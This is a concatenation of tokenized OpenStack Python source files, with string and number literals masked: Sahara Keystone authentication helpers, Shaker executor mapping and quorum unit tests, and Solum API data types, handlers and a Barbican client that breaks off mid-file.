<s> from keystoneclient . auth import identity as keystone_identity <EOL> from keystoneclient import session as keystone_session <EOL> from keystoneclient . v2_0 import client as keystone_client <EOL> from keystoneclient . v3 import client as keystone_client_v3 <EOL> from oslo_config import cfg <EOL> from sahara import context <EOL> from sahara . service import sessions <EOL> from sahara . utils . openstack import base <EOL> opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = True , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT:default>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT:default>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ] <EOL> ssl_opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> ] <EOL> keystone_group = cfg . OptGroup ( name = '<STR_LIT>' , <EOL> title = '<STR_LIT>' ) <EOL> CONF = cfg . CONF <EOL> CONF . register_group ( keystone_group ) <EOL> CONF . register_opts ( opts ) <EOL> CONF . register_opts ( ssl_opts , group = keystone_group ) <EOL> def auth ( ) : <EOL> '''<STR_LIT>''' <EOL> ctx = context . current ( ) <EOL> return ctx . auth_plugin or token_auth ( token = context . get_auth_token ( ) , <EOL> project_id = ctx . tenant_id ) <EOL> def auth_for_admin ( project_name = None , trust_id = None ) : <EOL> '''<STR_LIT>''' <EOL> auth = _password_auth ( <EOL> username = CONF . keystone_authtoken . admin_user , <EOL> password = CONF . keystone_authtoken . admin_password , <EOL> project_name = project_name , <EOL> user_domain_name = CONF . admin_user_domain_name , <EOL> project_domain_name = CONF . 
admin_project_domain_name , <EOL> trust_id = trust_id ) <EOL> return auth <EOL> def auth_for_proxy ( username , password , trust_id = None ) : <EOL> '''<STR_LIT>''' <EOL> auth = _password_auth ( <EOL> username = username , <EOL> password = password , <EOL> user_domain_name = CONF . proxy_user_domain_name , <EOL> trust_id = trust_id ) <EOL> return auth <EOL> def client ( ) : <EOL> '''<STR_LIT>''' <EOL> return client_from_auth ( auth ( ) ) <EOL> def client_for_admin ( ) : <EOL> '''<STR_LIT>''' <EOL> auth = auth_for_admin ( <EOL> project_name = CONF . keystone_authtoken . admin_tenant_name ) <EOL> return client_from_auth ( auth ) <EOL> def client_from_auth ( auth ) : <EOL> '''<STR_LIT>''' <EOL> session = sessions . cache ( ) . get_session ( sessions . SESSION_TYPE_KEYSTONE ) <EOL> if CONF . use_identity_api_v3 : <EOL> client_class = keystone_client_v3 . Client <EOL> else : <EOL> client_class = keystone_client . Client <EOL> return client_class ( session = session , auth = auth ) <EOL> def project_id_from_auth ( auth ) : <EOL> '''<STR_LIT>''' <EOL> return auth . get_project_id ( <EOL> sessions . cache ( ) . get_session ( sessions . SESSION_TYPE_KEYSTONE ) ) <EOL> def service_catalog_from_auth ( auth ) : <EOL> '''<STR_LIT>''' <EOL> if CONF . use_identity_api_v3 : <EOL> return auth . get_access ( <EOL> sessions . cache ( ) . get_session ( ) ) . get ( '<STR_LIT>' , [ ] ) <EOL> else : <EOL> return auth . get_access ( <EOL> sessions . cache ( ) . get_session ( ) ) . get ( '<STR_LIT>' , [ ] ) <EOL> def session_for_admin ( ) : <EOL> '''<STR_LIT>''' <EOL> auth = _password_auth ( <EOL> username = CONF . keystone_authtoken . admin_user , <EOL> password = CONF . keystone_authtoken . admin_password , <EOL> project_name = CONF . keystone_authtoken . admin_tenant_name , <EOL> user_domain_name = CONF . admin_user_domain_name , <EOL> project_domain_name = CONF . admin_project_domain_name ) <EOL> return keystone_session . 
Session ( auth = auth ) <EOL> def token_auth ( token , project_id = None , project_name = None , <EOL> project_domain_name = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> token_kwargs = dict ( <EOL> auth_url = base . retrieve_auth_url ( CONF . keystone . endpoint_type ) , <EOL> token = token <EOL> ) <EOL> if CONF . use_identity_api_v3 : <EOL> token_kwargs . update ( dict ( <EOL> project_id = project_id , <EOL> project_name = project_name , <EOL> project_domain_name = project_domain_name , <EOL> ) ) <EOL> auth = keystone_identity . v3 . Token ( ** token_kwargs ) <EOL> else : <EOL> token_kwargs . update ( dict ( <EOL> tenant_id = project_id , <EOL> tenant_name = project_name , <EOL> ) ) <EOL> auth = keystone_identity . v2 . Token ( ** token_kwargs ) <EOL> return auth <EOL> def token_from_auth ( auth ) : <EOL> '''<STR_LIT>''' <EOL> return keystone_session . Session ( <EOL> auth = auth , verify = CONF . generic_session_verify ) . get_token ( ) <EOL> def user_id_from_auth ( auth ) : <EOL> '''<STR_LIT>''' <EOL> return auth . get_user_id ( sessions . cache ( ) . get_session ( <EOL> sessions . SESSION_TYPE_KEYSTONE ) ) <EOL> def _client ( username , password = None , token = None , tenant_name = None , <EOL> tenant_id = None , trust_id = None , domain_name = None ) : <EOL> if trust_id and not CONF . use_identity_api_v3 : <EOL> raise Exception ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> auth_url = base . retrieve_auth_url ( <EOL> endpoint_type = CONF . keystone . endpoint_type ) <EOL> client_kwargs = { '<STR_LIT:username>' : username , <EOL> '<STR_LIT:password>' : password , <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT>' : tenant_name , <EOL> '<STR_LIT>' : tenant_id , <EOL> '<STR_LIT>' : trust_id , <EOL> '<STR_LIT>' : domain_name , <EOL> '<STR_LIT>' : auth_url , <EOL> '<STR_LIT>' : CONF . keystone . ca_file , <EOL> '<STR_LIT>' : CONF . keystone . api_insecure <EOL> } <EOL> if CONF . use_identity_api_v3 : <EOL> keystone = keystone_client_v3 . 
Client ( ** client_kwargs ) <EOL> keystone . management_url = auth_url <EOL> else : <EOL> keystone = keystone_client . Client ( ** client_kwargs ) <EOL> return keystone <EOL> def _password_auth ( username , password , <EOL> project_name = None , user_domain_name = None , <EOL> project_domain_name = None , trust_id = None ) : <EOL> '''<STR_LIT>''' <EOL> passwd_kwargs = dict ( <EOL> auth_url = base . retrieve_auth_url ( CONF . keystone . endpoint_type ) , <EOL> username = username , <EOL> password = password <EOL> ) <EOL> if CONF . use_identity_api_v3 : <EOL> passwd_kwargs . update ( dict ( <EOL> project_name = project_name , <EOL> user_domain_name = user_domain_name , <EOL> project_domain_name = project_domain_name , <EOL> trust_id = trust_id <EOL> ) ) <EOL> auth = keystone_identity . v3 . Password ( ** passwd_kwargs ) <EOL> else : <EOL> passwd_kwargs . update ( dict ( <EOL> tenant_name = project_name , <EOL> trust_id = trust_id <EOL> ) ) <EOL> auth = keystone_identity . v2 . Password ( ** passwd_kwargs ) <EOL> return auth </s>
<s> from shaker . engine . executors import flent <EOL> from shaker . engine . executors import iperf <EOL> from shaker . engine . executors import netperf <EOL> from shaker . engine . executors import shell <EOL> EXECUTORS = { <EOL> '<STR_LIT>' : shell . ShellExecutor , <EOL> '<STR_LIT>' : netperf . NetperfExecutor , <EOL> '<STR_LIT>' : iperf . IperfExecutor , <EOL> '<STR_LIT>' : iperf . IperfGraphExecutor , <EOL> '<STR_LIT>' : iperf . Iperf3Executor , <EOL> '<STR_LIT>' : flent . FlentExecutor , <EOL> '<STR_LIT>' : shell . ShellExecutor , <EOL> } <EOL> def get_executor ( test_definition , agent ) : <EOL> executor_class = test_definition [ '<STR_LIT:class>' ] <EOL> klazz = EXECUTORS . get ( executor_class , EXECUTORS [ '<STR_LIT>' ] ) <EOL> return klazz ( test_definition , agent ) </s>
<s> import functools <EOL> import mock <EOL> import testtools <EOL> from shaker . engine . executors import base as base_executor <EOL> from shaker . engine import quorum as quorum_pkg <EOL> STEP = <NUM_LIT:10> <EOL> LOSS_TIMEOUT = <NUM_LIT> <EOL> JOIN_TIMEOUT = <NUM_LIT> <EOL> make_quorum = functools . partial ( quorum_pkg . Quorum , polling_interval = STEP , <EOL> agent_loss_timeout = LOSS_TIMEOUT , <EOL> agent_join_timeout = JOIN_TIMEOUT ) <EOL> class DummyExecutor ( base_executor . BaseExecutor ) : <EOL> def __init__ ( self , duration = STEP ) : <EOL> super ( DummyExecutor , self ) . __init__ ( { } , None ) <EOL> self . duration = duration <EOL> def get_expected_duration ( self ) : <EOL> return self . duration <EOL> def process_reply ( self , message ) : <EOL> return super ( DummyExecutor , self ) . process_reply ( message ) <EOL> def get_command ( self ) : <EOL> return '<STR_LIT>' <EOL> class TestQuorum ( testtools . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . mock_time = mock . Mock ( ) <EOL> self . _mock_patch = mock . patch ( '<STR_LIT>' , self . mock_time ) <EOL> self . _mock_patch . start ( ) <EOL> return super ( TestQuorum , self ) . setUp ( ) <EOL> def tearDown ( self ) : <EOL> self . _mock_patch . stop ( ) <EOL> return super ( TestQuorum , self ) . tearDown ( ) <EOL> def _reply ( self , expected ) : <EOL> def reply_handler ( reply_message ) : <EOL> self . assertEqual ( expected , reply_message ) <EOL> return reply_handler <EOL> def _message_queue_gen ( self , event_stream , fail_at_end = True ) : <EOL> for event in event_stream : <EOL> self . mock_time . return_value = event [ '<STR_LIT:time>' ] <EOL> yield ( event [ '<STR_LIT>' ] , self . _reply ( event [ '<STR_LIT>' ] ) ) <EOL> def test_poll_reply ( self ) : <EOL> self . mock_time . 
return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = <NUM_LIT:20> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> def test_poll_reply_unknown_agent_ignored ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = <NUM_LIT:20> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = <NUM_LIT:20> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> def test_lost_agent ( self ) : <EOL> self . mock_time . 
return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:10> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> def test_agent_loss_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = LOSS_TIMEOUT ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = LOSS_TIMEOUT ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> def test_good_and_lost ( self ) : <EOL> self . mock_time . 
return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:2> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = <NUM_LIT:20> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:10> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) , <EOL> '<STR_LIT>' : DummyExecutor ( ) , <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( set ( result . keys ( ) ) , set ( test_case . keys ( ) ) ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> def test_wait_agentexecutening_long_test ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP * <NUM_LIT:9> ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . 
HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:4> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:9> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( duration = STEP * <NUM_LIT:9> ) <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> def test_good_and_interrupted ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:2> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = <NUM_LIT:20> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream , <EOL> fail_at_end = False ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) , <EOL> '<STR_LIT>' : DummyExecutor ( ) , <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> self . 
assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> def test_join_succeed ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , polling_interval = STEP , <EOL> expected_duration = <NUM_LIT:0> ) , <EOL> time = STEP ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:2> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:2> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> result = quorum . join ( [ '<STR_LIT>' ] ) <EOL> lost = [ agent_id for agent_id , r in result . items ( ) <EOL> if r [ '<STR_LIT:status>' ] == '<STR_LIT>' ] <EOL> self . assertEqual ( [ ] , lost ) <EOL> def test_join_failed ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , polling_interval = STEP , <EOL> expected_duration = <NUM_LIT:0> ) , <EOL> time = STEP ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = JOIN_TIMEOUT + STEP * <NUM_LIT:2> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> result = quorum . join ( [ '<STR_LIT>' ] ) <EOL> lost = [ agent_id for agent_id , r in result . items ( ) <EOL> if r [ '<STR_LIT:status>' ] == '<STR_LIT>' ] <EOL> self . assertEqual ( [ '<STR_LIT>' ] , lost ) </s>
<s> import json <EOL> from functionaltests . api import base <EOL> class TestExtensionController ( base . TestCase ) : <EOL> def test_extensions_get_all ( self ) : <EOL> resp , body = self . client . get ( '<STR_LIT>' ) <EOL> data = json . loads ( body ) <EOL> self . assertEqual ( resp . status , <NUM_LIT:200> ) <EOL> self . assertEqual ( data , [ ] ) </s>
<s> import copy <EOL> import pecan <EOL> from pecan import core <EOL> from solum . api . controllers . camp . v1_1 . datamodel import types as camp_types <EOL> from solum . api . controllers . camp . v1_1 import uris <EOL> from solum . api . controllers import common_types <EOL> from solum . api . controllers . v1 . datamodel import types as api_types <EOL> from solum . api . handlers . camp import attribute_definition_handler <EOL> class AttributeLink ( common_types . Link ) : <EOL> """<STR_LIT>""" <EOL> required = camp_types . BooleanType <EOL> """<STR_LIT>""" <EOL> mutable = camp_types . BooleanType <EOL> """<STR_LIT>""" <EOL> consumer_mutable = camp_types . BooleanType <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def from_json ( cls , dct ) : <EOL> ret_val = cls ( ) <EOL> for key , value in dct . items ( ) : <EOL> if hasattr ( ret_val , key ) : <EOL> setattr ( ret_val , key , value ) <EOL> return ret_val <EOL> def fix_uris ( self , host_url ) : <EOL> handler = ( attribute_definition_handler . <EOL> AttributeDefinitionHandler ( pecan . request . security_context ) ) <EOL> raw_def = handler . get ( self . href ) <EOL> if not raw_def : <EOL> core . abort ( <NUM_LIT> , <EOL> '<STR_LIT>' % <EOL> self . href ) <EOL> self . target_name = raw_def . name <EOL> self . href = uris . ATTRIBUTE_DEF_URI_STR % ( host_url , self . href ) <EOL> class TypeDefinition ( api_types . Base ) : <EOL> """<STR_LIT>""" <EOL> documentation = common_types . Uri <EOL> """<STR_LIT>""" <EOL> inherits_from = [ common_types . Link ] <EOL> """<STR_LIT>""" <EOL> attribute_definition_links = [ AttributeLink ] <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwds ) : <EOL> super ( TypeDefinition , self ) . __init__ ( ** kwds ) <EOL> @ classmethod <EOL> def from_json ( cls , dct ) : <EOL> ret_val = cls ( ) <EOL> for key , value in dct . items ( ) : <EOL> if key == '<STR_LIT>' : <EOL> inherit_links = [ ] <EOL> for l_dict in value : <EOL> link = common_types . 
Link ( href = l_dict [ '<STR_LIT>' ] , <EOL> target_name = l_dict [ '<STR_LIT>' ] ) <EOL> inherit_links . append ( link ) <EOL> setattr ( ret_val , '<STR_LIT>' , inherit_links ) <EOL> elif key == '<STR_LIT>' : <EOL> ad_links = [ ] <EOL> for ad_dct in value : <EOL> ad_link = AttributeLink . from_json ( ad_dct ) <EOL> ad_links . append ( ad_link ) <EOL> setattr ( ret_val , '<STR_LIT>' , ad_links ) <EOL> elif hasattr ( ret_val , key ) : <EOL> setattr ( ret_val , key , value ) <EOL> else : <EOL> core . abort ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return ret_val <EOL> def fix_uris ( self , host_url ) : <EOL> """<STR_LIT>""" <EOL> ret_val = copy . deepcopy ( self ) <EOL> ret_val . uri = uris . TYPE_DEF_URI_STR % ( host_url , ret_val . uri ) <EOL> if ret_val . inherits_from : <EOL> for ih_link in ret_val . inherits_from : <EOL> ih_link . href = uris . TYPE_DEF_URI_STR % ( host_url , ih_link . href ) <EOL> for ad_link in ret_val . attribute_definition_links : <EOL> ad_link . fix_uris ( host_url ) <EOL> return ret_val <EOL> class TypeDefinitions ( api_types . Base ) : <EOL> """<STR_LIT>""" <EOL> type_definition_links = [ common_types . Link ] <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwds ) : <EOL> super ( TypeDefinitions , self ) . __init__ ( ** kwds ) </s>
<s> import string <EOL> import wsme <EOL> from wsme import types as wtypes <EOL> from solum . api . controllers import common_types <EOL> from solum . openstack . common . gettextutils import _ <EOL> class Base ( wtypes . Base ) : <EOL> """<STR_LIT>""" <EOL> uri = common_types . Uri <EOL> "<STR_LIT>" <EOL> base_url = common_types . Uri <EOL> "<STR_LIT>" <EOL> uuid = wtypes . text <EOL> "<STR_LIT>" <EOL> def get_name ( self ) : <EOL> return self . __name <EOL> def set_name ( self , value ) : <EOL> allowed_chars = string . ascii_letters + string . digits + '<STR_LIT>' <EOL> for ch in value : <EOL> if ch not in allowed_chars : <EOL> raise ValueError ( _ ( '<STR_LIT>' ) ) <EOL> self . __name = value <EOL> name = wtypes . wsproperty ( str , get_name , set_name , mandatory = True ) <EOL> "<STR_LIT>" <EOL> type = wtypes . text <EOL> "<STR_LIT>" <EOL> description = wtypes . text <EOL> "<STR_LIT>" <EOL> tags = [ wtypes . text ] <EOL> "<STR_LIT>" <EOL> project_id = wtypes . text <EOL> "<STR_LIT>" <EOL> user_id = wtypes . text <EOL> "<STR_LIT>" <EOL> def __init__ ( self , ** kwds ) : <EOL> self . __name = wsme . Unset <EOL> super ( Base , self ) . __init__ ( ** kwds ) <EOL> @ classmethod <EOL> def from_db_model ( cls , m , host_url ) : <EOL> json = m . as_dict ( ) <EOL> json [ '<STR_LIT:type>' ] = m . __tablename__ <EOL> json [ '<STR_LIT>' ] = '<STR_LIT>' % ( host_url , m . __resource__ , m . uuid ) <EOL> del json [ '<STR_LIT:id>' ] <EOL> return cls ( ** ( json ) ) <EOL> def as_dict ( self , db_model ) : <EOL> valid_keys = ( attr for attr in db_model . __dict__ . keys ( ) <EOL> if attr [ : <NUM_LIT:2> ] != '<STR_LIT>' and attr != '<STR_LIT>' ) <EOL> return self . as_dict_from_keys ( valid_keys ) <EOL> def as_dict_from_keys ( self , keys ) : <EOL> return dict ( ( k , getattr ( self , k ) ) <EOL> for k in keys <EOL> if hasattr ( self , k ) and <EOL> getattr ( self , k ) != wsme . Unset ) <EOL> class MultiType ( wtypes . 
UserType ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * types ) : <EOL> self . types = types <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . join ( map ( str , self . types ) ) <EOL> def validate ( self , value ) : <EOL> for t in self . types : <EOL> try : <EOL> return wtypes . validate_value ( t , value ) <EOL> except ( ValueError , TypeError ) : <EOL> pass <EOL> else : <EOL> raise ValueError ( <EOL> _ ( "<STR_LIT>" ) <EOL> % { '<STR_LIT:type>' : self . types , '<STR_LIT:value>' : type ( value ) } ) <EOL> PortType = wtypes . IntegerType ( minimum = <NUM_LIT:1> , maximum = <NUM_LIT> ) </s>
<s> import uuid <EOL> from solum . api . handlers import handler <EOL> from solum . common import catalog <EOL> from solum . common import clients <EOL> from solum import objects <EOL> from solum . openstack . common import log as logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class InfrastructureStackHandler ( handler . Handler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self , id ) : <EOL> """<STR_LIT>""" <EOL> return objects . registry . InfrastructureStack . get_by_uuid ( <EOL> self . context , id ) <EOL> def update ( self , id , data ) : <EOL> """<STR_LIT>""" <EOL> updated = objects . registry . InfrastructureStack . update_and_save ( <EOL> self . context , id , data ) <EOL> return updated <EOL> def delete ( self , id ) : <EOL> """<STR_LIT>""" <EOL> db_obj = objects . registry . InfrastructureStack . get_by_uuid ( <EOL> self . context , id ) <EOL> db_obj . destroy ( self . context ) <EOL> def create ( self , data ) : <EOL> """<STR_LIT>""" <EOL> db_obj = objects . registry . InfrastructureStack ( ) <EOL> db_obj . update ( data ) <EOL> db_obj . uuid = str ( uuid . uuid4 ( ) ) <EOL> db_obj . user_id = self . context . user <EOL> db_obj . project_id = self . context . tenant <EOL> self . _create_zaqar_queue ( db_obj . uuid ) <EOL> db_obj . heat_stack_id = self . _deploy_infra ( data . get ( '<STR_LIT>' ) ) <EOL> db_obj . create ( self . context ) <EOL> return db_obj <EOL> def _create_zaqar_queue ( self , queue_name ) : <EOL> osc = clients . OpenStackClients ( self . context ) <EOL> osc . zaqar ( ) . queue ( queue_name ) <EOL> def _deploy_infra ( self , image_id ) : <EOL> osc = clients . OpenStackClients ( self . context ) <EOL> parameters = { '<STR_LIT:image>' : image_id } <EOL> template = catalog . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> created_stack = osc . heat ( ) . stacks . 
create ( stack_name = '<STR_LIT>' , <EOL> template = template , <EOL> parameters = parameters ) <EOL> return created_stack [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> def get_all ( self ) : <EOL> """<STR_LIT>""" <EOL> return objects . registry . InfrastructureStackList . get_all ( self . context ) </s>
<s> from barbicanclient import client as barbicanclient <EOL> from keystoneclient . auth import identity <EOL> from keystoneclient import session <EOL> from oslo_config import cfg <EOL> from solum . openstack . common import importutils <EOL> class BarbicanClient ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , verify = True ) : <EOL> self . verify = verify <EOL> self . _admin_client = None <EOL> @ property <EOL> def admin_client ( self ) : <EOL> if not self . _admin_client : <EOL> self . _admin_client = self . _barbican_admin_init ( ) <EOL> return self . _admin_client <EOL> def _barbican_admin_init ( self ) : <EOL> importutils . import_module ( '<STR_LIT>' ) <EOL> auth = identity . v2 . Password ( <EOL> auth_url = cfg . CONF . keystone_authtoken . auth_uri , <EOL> username = cfg . CONF . keystone_authtoken . admin_user , <EOL> password = cfg . CONF . keystone_authtoken . admin_password , <EOL> tenant_name = cfg . CONF . keystone_authtoken . admin_tenant_name ) <EOL> sess = session 